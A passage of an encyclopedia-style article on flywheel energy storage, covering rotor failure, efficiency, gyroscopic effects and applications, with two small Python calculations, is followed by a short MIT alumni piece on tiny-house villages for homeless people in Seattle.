Examples include the carbon-fiber composite flywheel from Beacon Power Corporation[13] and the *PowerThru* flywheel from Phillips Service Industries.[14] Alternatively, Calnetix utilizes aerospace-grade high-performance steel in their flywheel construction.[15] For these rotors, the relationship between material properties, geometry and energy density can be expressed by using a weighed-average approach.[16]

### Tensile strength and failure modes

One of the primary limits to flywheel design is the tensile strength of the rotor. Generally speaking, the stronger the disc, the faster it may be spun, and the more energy the system can store. (Making the flywheel heavier without a corresponding increase in strength will slow the maximum speed the flywheel can spin without rupturing, hence will not increase the total amount of energy the flywheel can store.)

When the tensile strength of a composite flywheel's outer binding cover is exceeded, the binding cover will fracture, and the wheel will shatter as the outer wheel compression is lost around the entire circumference, releasing all of its stored energy at once; this is commonly referred to as "flywheel explosion" since wheel fragments can reach kinetic energy comparable to that of a bullet. Composite materials that are wound and glued in layers tend to disintegrate quickly, first into small-diameter filaments that entangle and slow each other, and then into red-hot powder; a cast metal flywheel throws off large chunks of high-speed shrapnel.

For a cast metal flywheel, the failure limit is the binding strength of the grain boundaries of the polycrystalline molded metal. Aluminum in particular suffers from fatigue and can develop microfractures from repeated low-energy stretching. Angular forces may cause portions of a metal flywheel to bend outward and begin dragging on the outer containment vessel, or to separate completely and bounce randomly around the interior. The rest of the flywheel is now severely unbalanced, which may lead to rapid bearing failure from vibration, and sudden shock fracturing of large segments of the flywheel.

Traditional flywheel systems require strong containment vessels as a safety precaution, which increases the total mass of the device. The energy release from failure can be dampened with a gelatinous or encapsulated liquid inner housing lining, which will boil and absorb the energy of destruction. Still, many customers of large-scale flywheel energy-storage systems prefer to have them embedded in the ground to halt any material that might escape the containment vessel.

### Energy storage efficiency

Flywheel energy storage systems using mechanical bearings can lose 20% to 50% of their energy in two hours.[17] Much of the friction responsible for this energy loss results from the flywheel changing orientation due to the rotation of the earth (an effect similar to that shown by a Foucault pendulum). This change in orientation is resisted by the gyroscopic forces exerted by the flywheel's angular momentum, thus exerting a force against the mechanical bearings. This force increases friction. This can be avoided by aligning the flywheel's axis of rotation parallel to that of the earth's axis of rotation.[citation needed]

Conversely, flywheels with magnetic bearings and high vacuum can maintain 97% mechanical efficiency, and 85% round trip efficiency.[18]

### Effects of angular momentum in vehicles

When used in vehicles, flywheels also act as gyroscopes, since their angular momentum is typically of a similar order of magnitude as the forces acting on the moving vehicle. This property may be detrimental to the vehicle's handling characteristics while turning or driving on rough ground; driving onto the side of a sloped embankment may cause wheels to partially lift off the ground as the flywheel opposes sideways tilting forces.
On the other hand, this property could be utilized to keep the car balanced so as to keep it from rolling over during sharp turns.[19] When a flywheel is used entirely for its effects on the attitude of a vehicle, rather than for energy storage, it is called a reaction wheel or a control moment gyroscope.

The resistance of angular tilting can be almost completely removed by mounting the flywheel within an appropriately applied set of gimbals, allowing the flywheel to retain its original orientation without affecting the vehicle (see *Properties* of a gyroscope). This does not avoid the complication of gimbal lock, and so a compromise between the number of gimbals and the angular freedom is needed. The center axle of the flywheel acts as a single gimbal, and if aligned vertically, allows for the 360 degrees of yaw in a horizontal plane. However, for instance driving up-hill requires a second pitch gimbal, and driving on the side of a sloped embankment requires a third roll gimbal.

#### Full-motion gimbals

Although the flywheel itself may be of a flat ring shape, a free-movement gimbal mounting inside a vehicle requires a spherical volume for the flywheel to freely rotate within. Left to its own, a spinning flywheel in a vehicle would slowly precess following the Earth's rotation, and precess further yet in vehicles that travel long distances over the Earth's curved spherical surface. A full-motion gimbal has additional problems of how to communicate power into and out of the flywheel, since the flywheel could potentially flip completely over once a day, precessing as the Earth rotates. Full free rotation would require slip rings around each gimbal axis for power conductors, further adding to the design complexity.
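The scale of these gyroscopic effects follows from the standard relation τ = I·ω·Ω (reaction torque = moment of inertia × spin rate × tilt rate). A numerical sketch — the flywheel mass, radius, speed, and tilt rate below are illustrative values of the order used in automotive systems, not figures from this article:

```python
import math

def ring_inertia(mass_kg, radius_m):
    """Moment of inertia about the spin axis, approximating the rotor as a thin ring."""
    return mass_kg * radius_m ** 2

def gyroscopic_torque(inertia, spin_rpm, tilt_rate_deg_s):
    """Reaction torque (N*m) when a spinning flywheel is tilted off its axis."""
    omega = spin_rpm * 2 * math.pi / 60      # spin rate in rad/s
    tilt = math.radians(tilt_rate_deg_s)     # tilt rate in rad/s
    return inertia * omega * tilt

# A 6 kg rotor of 10 cm radius at 60,000 rpm, tilted at 30 deg/s as a car corners:
I = ring_inertia(6.0, 0.10)
tau = gyroscopic_torque(I, 60_000, 30.0)     # roughly 200 N*m
```

Even a small, light rotor at high speed pushes back with a torque comparable to an engine's output, which is why the text turns to gimbals and counter-rotating pairs.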
#### Limited-motion gimbals

To reduce space usage, the gimbal system may be of a limited-movement design, using shock absorbers to cushion sudden rapid motions within a certain number of degrees of out-of-plane angular rotation, and then gradually forcing the flywheel to adopt the vehicle's current orientation. This reduces the gimbal movement space around a ring-shaped flywheel from a full sphere, to a short thickened cylinder, encompassing for example ± 30 degrees of pitch and ± 30 degrees of roll in all directions around the flywheel.

#### Counterbalancing of angular momentum

An alternative solution to the problem is to have two joined flywheels spinning synchronously in opposite directions. They would have a total angular momentum of zero and no gyroscopic effect. A problem with this solution is that when the difference between the momentum of each flywheel is anything other than zero, the housing of the two flywheels would exhibit torque. Both wheels must be maintained at the same speed to keep the angular velocity at zero. Strictly speaking, the two flywheels would exert a huge torqueing moment at the central point, trying to bend the axle. However, if the axle were sufficiently strong, no gyroscopic forces would have a net effect on the sealed container, so no torque would be noticed.

To further balance the forces and spread out strain, a single large flywheel can be balanced by two half-size flywheels on each side, or the flywheels can be reduced in size to be a series of alternating layers spinning in opposite directions. However, this increases housing and bearing complexity.

## Applications

### Transportation

#### Automotive

In the 1950s, flywheel-powered buses, known as gyrobuses, were used in Yverdon (Switzerland) and Ghent (Belgium), and there is ongoing research to make flywheel systems that are smaller, lighter, cheaper and have a greater capacity.
It is hoped that flywheel systems can replace conventional chemical batteries for mobile applications, such as for electric vehicles. Proposed flywheel systems would eliminate many of the disadvantages of existing battery power systems, such as low capacity, long charge times, heavy weight and short usable lifetimes. Flywheels may have been used in the experimental Chrysler Patriot, though that has been disputed.[20] Flywheels have also been proposed for use in continuously variable transmissions. Punch Powertrain is currently working on such a device.[21] During the 1990s, Rosen Motors developed a gas turbine powered series hybrid automotive powertrain using a 55,000 rpm flywheel to provide bursts of acceleration which the small gas turbine engine could not provide. The flywheel also stored energy through regenerative braking. The flywheel was composed of a titanium hub with a carbon fiber cylinder and was gimbal-mounted to minimize adverse gyroscopic effects on vehicle handling. The prototype vehicle was successfully road tested in 1997 but was never mass-produced.[22] In 2013, Volvo announced a flywheel system fitted to the rear axle of its S60 sedan. Braking action spins the flywheel at up to 60,000 rpm and stops the front-mounted engine. Flywheel energy is applied via a special transmission to partially or completely power the vehicle. The 20-centimetre (7.9 in), 6-kilogram (13 lb) carbon fiber flywheel spins in a vacuum to eliminate friction. When partnered with a four-cylinder engine, it offers up to a 25 percent reduction in fuel consumption versus a comparably performing turbo six-cylinder, providing an 80 horsepower (60 kW) boost and allowing it to reach 100 kilometres per hour (62 mph) in 5.5 seconds. 
The company did not announce specific plans to include the technology in its product line.[23]

In July 2014, GKN acquired the Williams Hybrid Power (WHP) division and intends to supply 500 carbon fiber *Gyrodrive* electric flywheel systems to urban bus operators over the next two years.[24] As the former developer's name implies, these were originally designed for Formula One motor racing applications. In September 2014, Oxford Bus Company announced that it is introducing 14 *Gyrodrive hybrid* buses by Alexander Dennis on its Brookes Bus operation.[25][26]

#### Rail vehicles

Flywheel systems have been used experimentally in small electric locomotives for shunting or switching, e.g. the Sentinel-Oerlikon Gyro Locomotive. Larger electric locomotives, e.g. British Rail Class 70, have sometimes been fitted with flywheel boosters to carry them over gaps in the third rail. Advanced flywheels, such as the 133 kWh pack of the University of Texas at Austin, can take a train from a standing start up to cruising speed.[2]

The Parry People Mover is a railcar which is powered by a flywheel. It was trialled on Sundays for 12 months on the Stourbridge Town Branch Line in the West Midlands, England, during 2006 and 2007, and was intended to be introduced as a full service by the train operator London Midland in December 2008 once two units had been ordered.
As of January 2010, both units are in operation.[27]

#### Rail electrification

FES can be used at the lineside of electrified railways to help regulate the line voltage, thus improving the acceleration of unmodified electric trains and the amount of energy recovered back to the line during regenerative braking, thus lowering energy bills.[28] Trials have taken place in London, New York, Lyon and Tokyo,[29] and New York MTA's Long Island Rail Road is now investing $5.2m in a pilot project on LIRR's West Hempstead Branch line.[30] These trials and systems store kinetic energy in rotors consisting of a carbon-glass composite cylinder packed with neodymium-iron-boron powder that forms a permanent magnet. These spin at up to 37,800 rpm, and each 100 kW (130 hp) unit can store 11 megajoules (3.1 kWh) of re-usable energy, approximately enough to accelerate a weight of 200 metric tons (220 short tons; 197 long tons) from zero to 38 km/h (24 mph).[29]

### Uninterruptible power supplies

Flywheel power storage systems in production as of 2001 had storage capacities comparable to batteries and faster discharge rates. They are mainly used to provide load leveling for large battery systems, such as an uninterruptible power supply for data centers, as they save a considerable amount of space compared to battery systems.[31]

Flywheel maintenance in general runs about one-half the cost of traditional battery UPS systems. The only maintenance is a basic annual preventive maintenance routine and replacing the bearings every five to ten years, which takes about four hours.[7] Newer flywheel systems completely levitate the spinning mass using maintenance-free magnetic bearings, thus eliminating mechanical bearing maintenance and failures.[7] Costs of a fully installed flywheel UPS (including power conditioning) were (in 2009) about $330 per kilowatt (for 15 seconds full-load capacity).[32]

### Test laboratories

A long-standing niche market for flywheel power systems are facilities where circuit breakers and similar devices are tested: even a small household circuit breaker may be rated to interrupt a current of 10,000 or more amperes, and larger units may have interrupting ratings of 100,000 or 1,000,000 amperes. The enormous transient loads produced by deliberately forcing such devices to demonstrate their ability to interrupt simulated short circuits would have unacceptable effects on the local grid if these tests were done directly from building power. Typically such a laboratory will have several large motor–generator sets, which can be spun up to speed over several minutes; then the motor is disconnected before a circuit breaker is tested.

### Physics laboratories

Tokamak fusion experiments need very high currents for brief intervals (mainly to power large electromagnets for a few seconds).

- JET (the Joint European Torus) has two 775 t (854 short tons; 763 long tons) flywheels (installed in 1981) that spin up to 225 rpm.[33] Each flywheel stores 3.75 GJ and can deliver at up to 400 MW (540,000 hp).[34]
- The Helically Symmetric Experiment at the University of Wisconsin–Madison has 18 one-ton flywheels, which are spun to 10,000 rpm using repurposed electric train motors.
- ASDEX Upgrade has 3 flywheel generators.
- DIII-D (tokamak) at General Atomics
- the Princeton Large Torus (PLT) at the Princeton Plasma Physics Laboratory

Also the non-tokamak Nimrod synchrotron at the Rutherford Appleton Laboratory had two 30 ton flywheels.

### Aircraft launching systems

The *Gerald R. Ford*-class aircraft carrier will use flywheels to accumulate energy from the ship's power supply, for rapid release into the electromagnetic aircraft launch system. The shipboard power system cannot on its own supply the high power transients necessary to launch aircraft. Each of four rotors will store 121 MJ (34 kWh) at 6400 rpm. They can store 122 MJ (34 kWh) in 45 seconds and release it in 2–3 seconds.[35] The flywheel energy densities are 28 kJ/kg (8 W·h/kg); including the stators and cases this comes down to 18.1 kJ/kg (5 W·h/kg), excluding the torque frame.[35]

### NASA G2 flywheel for spacecraft energy storage

This was a design funded by NASA's Glenn Research Center and intended for component testing in a laboratory environment. It used a carbon fiber rim with a titanium hub designed to spin at 60,000 rpm, mounted on magnetic bearings. Weight was limited to 250 pounds (110 kilograms). Storage was 525 Wh (1.89 MJ) and could be charged or discharged at 1 kW (1.3 hp), leading to a specific energy of 5.31 W⋅h/kg and power density of 10.11 W/kg.[36] The working model ran at 41,000 rpm on September 2, 2004.[37]

### Amusement rides

The Montezooma's Revenge roller coaster at Knott's Berry Farm was the first flywheel-launched roller coaster in the world and is the last ride of its kind still operating in the United States. The ride uses a 7.6-tonne flywheel to accelerate the train to 55 miles per hour (89 km/h) in 4.5 seconds. The Incredible Hulk roller coaster at Universal's Islands of Adventure features a rapidly accelerating uphill launch as opposed to the typical gravity drop.
This is achieved through powerful traction motors that throw the car up the track. To achieve the brief very high current required to accelerate a full coaster train to full speed uphill, the park utilizes several motor-generator sets with large flywheels. Without these stored energy units, the park would have to invest in a new substation or risk browning-out the local energy grid every time the ride launches.

### Pulse power

Flywheel energy storage systems (FESS) are found in a variety of applications ranging from grid-connected energy management to uninterruptible power supplies. As the technology progresses, FESS applications are evolving rapidly. Examples include high-power weapons, aircraft powertrains and shipboard power systems, where the system requires very high power for a short period, on the order of a few seconds or even milliseconds. The compensated pulsed alternator (compulsator), generally designed as a FESS, is one of the most popular pulsed power supplies for fusion reactors, high-power pulsed lasers, and hypervelocity electromagnetic launchers because of its high energy density and power density.[38] Compulsators (low-inductance alternators) act like capacitors: they can be spun up to provide pulsed power for railguns and lasers. Instead of having a separate flywheel and generator, only the large rotor of the alternator stores energy. See also Homopolar generator.[39]

### Motor sports

Using a continuously variable transmission (CVT), energy is recovered from the drive train during braking and stored in a flywheel.
This stored energy is then used during acceleration by altering the ratio of the CVT.[40] In motor sports applications this energy is used to improve acceleration rather than reduce carbon dioxide emissions – although the same technology can be applied to road cars to improve fuel efficiency.[41]

Automobile Club de l'Ouest, the organizer behind the annual 24 Hours of Le Mans event and the Le Mans Series, is currently "studying specific rules for LMP1 which will be equipped with a kinetic energy recovery system."[42] Williams Hybrid Power, a subsidiary of the Williams F1 Racing team,[43] has supplied Porsche and Audi with flywheel-based hybrid systems for Porsche's 911 GT3 R Hybrid[44] and Audi's R18 e-Tron Quattro.[45] Audi's victory in the 2012 24 Hours of Le Mans was the first for a hybrid (diesel-electric) vehicle.[46]

### Grid energy storage

Flywheels are sometimes used as short term spinning reserve for momentary grid frequency regulation and balancing sudden changes between supply and consumption. No carbon emissions, faster response times and the ability to buy power at off-peak hours are among the advantages of using flywheels instead of traditional sources of energy like natural gas turbines.[47] Operation is very similar to batteries in the same application; their differences are primarily economic.

Beacon Power opened a 5 MWh (20 MW over 15 mins)[18] flywheel energy storage plant in Stephentown, New York in 2011[48] using 200 flywheels[49] and a similar 20 MW system at Hazle Township, Pennsylvania in 2014.[50] A 0.5 MWh (2 MW for 15 min)[51] flywheel storage facility in Minto, Ontario, Canada opened in 2014.[52] The flywheel system (developed by NRStor) uses 10 spinning steel flywheels on magnetic bearings.[52] Amber Kinetics, Inc.
has an agreement with Pacific Gas and Electric (PG&E) for a 20 MW / 80 MWh flywheel energy storage facility located in Fresno, CA with a four-hour discharge duration.[53] A 30 MW flywheel grid system started operating in China in 2024.[54]

### Wind turbines

Flywheels may be used to store energy generated by wind turbines during off-peak periods or during high wind speeds. In 2010, Beacon Power began testing its Smart Energy 25 (Gen 4) flywheel energy storage system at a wind farm in Tehachapi, California. The system was part of a wind power/flywheel demonstration project being carried out for the California Energy Commission.[55]

### Toys

Friction motors used to power many toy cars, trucks, trains, action toys and such are simple flywheel motors.

### Toggle action presses

In industry, toggle action presses are still popular. The usual arrangement involves a very strong crankshaft and a heavy-duty connecting rod which drives the press. Large and heavy flywheels are driven by electric motors, but the flywheels turn the crankshaft only when clutches are activated.

### Beyond energy storage

Flywheels can be used for attitude control. There is also some research into motion control,[56] mostly to stabilize systems using the gyroscopic effect.

## Comparison to electric batteries

Flywheels are not as adversely affected by temperature changes, can operate at a much wider temperature range, and are not subject to many of the common failures of chemical rechargeable batteries.[57] They are also less potentially damaging to the environment, being largely made of inert or benign materials. Another advantage of flywheels is that by a simple measurement of the rotation speed it is possible to know the exact amount of energy stored.
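That last point can be made concrete: for a rotor with moment of inertia I spinning at angular velocity ω, the stored energy is E = ½Iω², so measuring rpm directly gives the energy. A minimal sketch (the rotor mass, radius, and speeds below are illustrative values only, not figures for any product described in this article):

```python
import math

def flywheel_energy_joules(inertia_kg_m2: float, rpm: float) -> float:
    """Kinetic energy of a spinning rotor: E = 1/2 * I * omega^2 (omega in rad/s)."""
    omega = rpm * 2 * math.pi / 60  # convert rpm to rad/s
    return 0.5 * inertia_kg_m2 * omega ** 2

# Hypothetical solid-cylinder rotor (values chosen purely for illustration):
mass_kg, radius_m = 100.0, 0.25
inertia = 0.5 * mass_kg * radius_m ** 2  # I = 1/2 m r^2 for a solid cylinder

e_j = flywheel_energy_joules(inertia, rpm=20000)
print(f"{e_j / 3.6e6:.2f} kWh")  # ≈ 1.90 kWh at 20,000 rpm

# Energy scales with the *square* of speed: doubling rpm quadruples storage.
print(flywheel_energy_joules(inertia, 40000) / e_j)  # 4.0
```

This quadratic dependence on speed is also why the article later notes that shrinking a flywheel forces higher speeds and therefore higher material stress.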
Unlike most batteries, which operate only for a finite period (for example roughly 10 years[58] in the case of lithium iron phosphate batteries), a flywheel potentially has an indefinite working lifespan. Flywheels built as part of James Watt steam engines have been continuously working for more than two hundred years.[59] Working examples of ancient flywheels used mainly in milling and pottery can be found in many locations in Africa, Asia, and Europe.[60][61]

Most modern flywheels are typically sealed devices that need minimal maintenance throughout their service lives. Magnetic bearing flywheels in vacuum enclosures, such as the NASA G2 model described above, do not need any bearing maintenance and are therefore superior to batteries both in terms of total lifetime and energy storage capacity, since their effective service lifespan is still unknown. Flywheel systems with mechanical bearings will have limited lifespans due to wear.

High performance flywheels can explode, killing bystanders with high-speed fragments. Flywheels can be installed below ground to reduce this risk. While batteries can catch fire and release toxins, there is generally time for bystanders to flee and escape injury.

The physical arrangement of batteries can be designed to match a wide variety of configurations, whereas a flywheel at a minimum must occupy a certain area and volume, because the energy it stores is proportional to its rotational inertia and to the square of its rotational speed. As a flywheel gets smaller, its mass also decreases, so the speed must increase, and so the stress on the materials increases. Where dimensions are a constraint (e.g.
under the chassis of a train), a flywheel may not be a viable solution.

## See also

- Beacon Power
- Compensated pulsed alternator – Form of power supply
- Electric double-layer capacitor – High-capacity electrochemical capacitor
- Energy storage – Captured energy for later usage
- Grid energy storage – Large scale electricity supply management
- Inverter – Device that changes direct current (DC) to alternating current (AC)
- Launch loop – Proposed system for launching objects into orbit
- List of energy storage projects
- List of energy topics – Overview of and topical guide to energy
- Plug-in hybrid – Hybrid vehicle whose battery may be externally charged
- Rechargeable battery – Type of electrical battery
- Regenerative brake – Energy recovery mechanism
- Rotational energy – Kinetic energy of rotating body with moment of inertia and angular velocity
- STATCOM – Regulating device used on transmission networks
- United States Department of Energy International Energy Storage Database

## References

**^**Torotrak Toroidal variable drive CVT Archived May 16, 2011, at the Wayback Machine, retrieved June 7, 2007.- ^ **a****b****c****d**Castelvecchi, Davide (May 19, 2007). "Spinning into control: High-tech reincarnations of an ancient way of storing energy".**e***Science News*.**17**(20): 312–313. doi:10.1002/scin.2007.5591712010. Archived from the original on June 6, 2014. Retrieved August 2, 2012. **^**Flybrid Automotive Limited. "Original F1 System - Flybrid Automotive". Archived from the original on 2016-03-03. Retrieved 2010-01-28.**^**"Superconducting bearings for flywheel applications". Archived from the original on 2019-05-13. Retrieved 2017-02-04.- ^ **a**"Home".**b***ITPEnergised*. **^**"Next-gen Of Flywheel Energy Storage". Product Design & Development. Archived from the original on 2010-07-10. Retrieved 2009-05-21.- ^ **a****b**Vere, Henry. "A Primer of Flywheel Technology". Distributed Energy.
Archived from the original on 2018-05-22. Retrieved 2008-10-06.**c** **^**rosseta Technik GmbH, Flywheel Energy Storage Model T4, retrieved February 4, 2010.**^**Genta, Giancarlo (1985).*Kinetic Energy Storage*. London: Butterworth & Co. Ltd.**^**"Flywheel Kinetic Energy".*The Engineering Toolbox*.**^**Genta, Giancarlo (1989). "Some considerations on the constant stress disc profile".*Meccanica*.**24**(4): 235–248. doi:10.1007/BF01556455. S2CID 122502834.**^**Li, Xiaojun; Anvari, Bahareh; Palazzolo, Alan; Wang, Zhiyang; Toliyat, Hamid (August 2018). "A Utility-Scale Flywheel Energy Storage System with a Shaftless, Hubless, High-Strength Steel Rotor".*IEEE Transactions on Industrial Electronics*.**65**(8): 6667–6675. doi:10.1109/TIE.2017.2772205. ISSN 0278-0046. S2CID 4557504.**^**"Carbon Fiber Flywheels". Retrieved 2016-10-07.**^**"PowerThru flywheel". Archived from the original on 2012-05-03. Retrieved 2012-04-29.**^**"Kinetic Energy Storage Systems". Retrieved 2016-10-27.**^**Janse van Rensburg, P. J. (December 2011).*Energy storage in composite flywheel rotors*(Thesis). University of Stellenbosch. hdl:10019.1/17864.**^**rosseta Technik GmbH, Flywheel Energy Storage, German, retrieved February 4, 2010.- ^ **a**Beacon Power Corp, Frequency Regulation and Flywheels fact sheet, retrieved July 11, 2011. Archived March 31, 2010, at the Wayback Machine**b** **^***Study on Rollover prevention of heavy-duty vehicles by using flywheel energy storage systems*, Suda Yoshihiro, Huh Junhoi, Aki Masahiko, Shihpin Lin, Ryoichi Takahata, Naomasa Mukaide, Proceedings of the FISITA 2012 World Automotive Congress, Lecture Notes in Electrical Engineering Volume 197, 2013, pp 693-701, doi:10.1007/978-3-642-33805-2 57**^**"Chrysler Patriot hybrid-electric racing car: 20 years early for F1 racing?". 16 November 2020.**^**"Agoria>GoodNews!>Archieven 2012>Punch Powertrain werkt aan revolutionaire vliegwiel-hybride transmissie". Archived from the original on 2013-05-22. 
Retrieved 2012-09-13.**^**Wakefield, Ernest (1998).*History of the Electric Automobile: Hybrid Electric Vehicles*. SAE. p. 332. ISBN 978-0-7680-0125-9.**^**"Volvo confirms fuel savings of 25 percent with flywheel KERS". Gizmag.com. 26 April 2013. Retrieved 2013-04-26.**^**"GKN and the Go-Ahead Group using F1 technology to improve fuel efficiency of London buses". 29 July 2014.**^**"It's the New BROOKESbus!".*Oxford Bus Company*. 5 September 2014.**^**"BBC News - Formula One race technology to power buses in Oxford".*BBC News*. 2 September 2014.**^**"Parry People Movers for Stourbridge branch line". London Midland. 2008-01-03. Archived from the original on 2008-05-17. Retrieved 2008-03-19.**^**"High-speed flywheels cut energy bill".*Railway Gazette International*. 2001-04-01. Archived from the original on 2011-06-15. Retrieved 2010-12-02.- ^ **a**"Kinetic energy storage wins acceptance".**b***Railway Gazette International*. 2004-04-01. Archived from the original on 2011-05-28. Retrieved 2010-12-02. **^**"New York orders flywheel energy storage".*Railway Gazette International*. 2009-08-14. Archived from the original on 2011-05-28. Retrieved 2011-02-09.**^**"Flywheels gain as alternative to batteries".*www.datacenterknowledge.com*. 26 June 2007. Retrieved 17 September 2024.**^**"Active Power Article - Flywheel energy storage - Claverton Group".*www.claverton-energy.com*. 21 June 2009. Retrieved 17 September 2024.**^**"Week 20: JET Experiments: sensitive to TV schedules". Archived from the original on 2020-07-31. Retrieved 2018-05-03.**^**"Power supply". Archived from the original on 2016-01-05. Retrieved 2015-12-07.- ^ **a**Michael R. Doyle; Douglas J. Samuel; Thomas Conway & Robert R. Klimowski (1994-04-15). Electromagnetic Aircraft Launch System - EMALS (PDF) (Report). Archived from the original (PDF) on 2003-07-08.**b** **^**G2 Flywheel Module Design**^**Jansen, Ralph H.; McLallin, Kerry L. (June 2005). 
"NASA Technical Reports Server (NTRS)".*Research and Technology 2004*.**^**Wang, H.; Liu, K.; Zhu, B.; Feng, J.; Ao, P.; Zhang, Z. (1 August 2015). "Analytical Investigation and Scaled Prototype Tests of a Novel Permanent Magnet Compulsator".*IEEE Transactions on Magnetics*.**51**(8): 2415466. Bibcode:2015ITM....5115466W. doi:10.1109/TMAG.2015.2415466. S2CID 24547533.**^**"COMPULSATORS".*orbitalvector.com*. Retrieved 31 March 2018.**^**Flybrid Automotive Limited. "Technology - Flybrid Automotive". Archived from the original on 2010-07-13. Retrieved 2007-11-09.**^**Flybrid Automotive Limited. "Road Car Systems - Flybrid Automotive".**^**"ACO Technical Regulations 2008 for Prototype "LM"P1 and "LM"P2 classes" (PDF). Automobile Club de l'Ouest (ACO). 2007-12-20. p. 3. Archived from the original (PDF) on May 17, 2008. Retrieved 2008-04-10.**^**"Williams Hybrid Power Motorsports Applications". Archived from the original on 2014-02-09. Retrieved 2014-03-05.**^**"911 GT3 R Hybrid Celebrates World Debut in Geneva".*www.porsche.com*. 2010-02-11. Retrieved 17 September 2024.**^**"Audi R18 e-Tron quattro".*www.ultimatecarpage.com*. Retrieved 17 September 2024.**^**Beer, Matt. "Audi #1 crew claims first hybrid Le Mans 24 Hours win".*Autosport*.**^**Flywheel-based Solutions for Grid Reliability Archived July 12, 2007, at the Wayback Machine**^**http://www.sandia.gov/ess/docs/pr_conferences/2014/Thursday/Session7/02_Areseneaux_Jim_20MW_Flywheel_Energy_Storage_Plant_140918.pdf[*bare URL PDF*]**^**"Stephentown, New York - Beacon Power".*beaconpower.com*. Retrieved 31 March 2018.**^**"Hazle Township, Pennsylvania - Beacon Power".*beaconpower.com*. Retrieved 31 March 2018.**^**"IESO Expedited System Impact Assessment - MINTO FLYWHEEL FACILITY" (PDF).*ieso.ca*. Archived from the original (PDF) on 29 January 2016. Retrieved 31 March 2018.- ^ **a**"Canada's first grid storage system launches in Ontario - PV-Tech Storage".**b***PV-Tech Storage*. Archived from the original on 2014-08-31. 
Retrieved 2014-07-30. **^**"PG&E Presents Innovative Energy Storage Agreements | PG&E".*www.pge.com*. Retrieved 2017-03-10.**^**"China connects its first large-scale flywheel storage project to grid".*Energy Storage*. 13 September 2024.**^**"Beacon Connects Flywheel System to California Wind Farm". 26 May 2023.**^**Lee, Sangdeok; Jung, Seul (September 2018). "Detection and control of a gyroscopically induced vibration to improve the balance of a single-wheel robot".*Journal of Low Frequency Noise, Vibration and Active Control*.**37**(3): 443–455. Bibcode:2018JLFNV..37..443L. doi:10.1177/0263092317716075. ISSN 1461-3484. S2CID 115243859.**^**"Lithium Battery Failures". Mpoweruk.com. Retrieved 2013-04-26.**^**"How to Optimize Your LiFePO4 Battery's Lifespan".*Goal Zero*. 16 January 2024.**^**Powerhouse Museum. "Boulton and Watt steam engine". Powerhouse Museum, Australia. Retrieved 2 August 2012.**^**Donners, K.; Waelkens, M.; Deckers, J. (2002). "Water Mills in the Area of Sagalassos: A Disappearing Ancient Technology".*Anatolian Studies*.**52**: 1–17. doi:10.2307/3643076. JSTOR 3643076. S2CID 163811541.**^**Wilson, A. (2002). "Machines, Power and the Ancient Economy".*The Journal of Roman Studies*.**92**: 1–32. doi:10.2307/3184857. JSTOR 3184857. S2CID 154629776.

## Further reading

- Beacon Power Applies for DOE Grants to Fund up to 50% of Two 20 MW Energy Storage Plants, Sep. 1, 2009
- Sheahen, Thomas P. (1994). *Introduction to High-Temperature Superconductivity*. New York: Plenum Press. pp. 76–78, 425–431. ISBN 978-0-306-44793-8.
- El-Wakil, M. M. (1984). *Powerplant Technology*. McGraw-Hill. pp. 685–689. ISBN 9780070192881.
- Koshizuka, N.; Ishikawa, F.; Nasu, H.; Murakami, M.; et al. (2003). "Progress of superconducting bearing technologies for flywheel energy storage systems". *Physica C*. **386** (386): 444–450. Bibcode:2003PhyC..386..444K. doi:10.1016/S0921-4534(02)02206-2.
- Wolsky, A. M. (2002).
"The status and prospects for flywheels and SMES that incorporate HTS". *Physica C*.**372**(372–376): 1495–1499. Bibcode:2002PhyC..372.1495W. doi:10.1016/S0921-4534(02)01057-2. - Sung, T. H.; Han, S. C.; Han, Y. H.; Lee, J. S.; et al. (2002). "Designs and analyses of flywheel energy storage systems using high-Tc superconductor bearings". *Cryogenics*.**42**(6–7): 357–362. Bibcode:2002Cryo...42..357S. doi:10.1016/S0011-2275(02)00057-7. - Akhil, Abbas; Swaminathan, Shiva; Sen, Rajat K. (February 2007). "Cost Analysis of Energy Storage Systems for Electric Utility Applications" (PDF). Sandia National laboratories. Archived from the original (PDF) on 2007-06-21. - Larbalestier, David; Blaugher, Richard D.; Schwall, Robert E.; Sokolowski, Robert S.; et al. (September 1997). "Flywheels". *Power Applications of Superconductivity in Japan and Germany*. World Technology Evaluation Center. - "A New Look at an Old Idea: The Electromechanical Battery" (PDF). *Science & Technology Review*: 12–19. April 1996. Archived from the original (PDF) on 2008-04-05. Retrieved 2006-07-21. - Janse van Rensburg, P.J. (December 2011). *Energy storage in composite flywheel rotors*(Thesis). University of Stellenbosch, South Africa. hdl:10019.1/17864. - Devitt, Drew (March 2010). "Making a case for flywheel energy storage". Renewable Energy World Magazine North America. - Li, X., & Palazzolo, A. (2022). A review of flywheel energy storage systems: State of the art and opportunities. *Journal of Energy Storage*,*46*, 103576. https://doi.org/10.1016/j.est.2021.103576
---

https://alum.mit.edu/slice/tiny-houses-solve-huge-problem
Julie Fox
# Tiny Houses Solve Huge Problem

“I believe very strongly that housing is a human right,” says Sharon Lee MArch '81, MCP '81, who is addressing the housing crisis in Seattle, Washington, the city with the third largest homeless population in the country after New York City and Los Angeles. As founder and executive director of the Low Income Housing Institute (LIHI), Lee has adjusted her strategy in the last few years as homelessness has become rampant. The solution: tiny houses.

Tiny houses are a growing trend in the real estate market for those with a minimalist goal, but they’re not just cute, they’re also practical. These tiny houses are eight feet by 12 feet and they include lights, heat, a window, and a door with a lock. LIHI’s tiny houses are built, often by local volunteers and students, in areas with open land or unused parking lots and are set up to be their own small community. Each tiny house village—there are seven throughout the city—has some sort of communal kitchen and bathroom facility. Most importantly, since the tiny houses are under 120 square feet, they aren’t considered a dwelling unit, so they can be built and operational quickly. “If you want to build a building, it takes a year to get financing, a year to get permits, and a year to year-and-a-half to build. In the meantime, people are literally dying on the streets,” says Lee.

According to Lee, there are approximately 11,000 homeless people in Seattle on any given night, which, due to space constraints of shelters, leaves nearly 5,000 completely unsheltered. Over the past two years, nearly 2,000 people have taken advantage of the tiny house communities, built by LIHI with the help of the City of Seattle—they fund the utilities to power the houses and provide social workers and case managers. The houses—meant to be a temporary solution—have proved to be more than temporary shelter: they are also a vehicle for residents to turn their lives around.
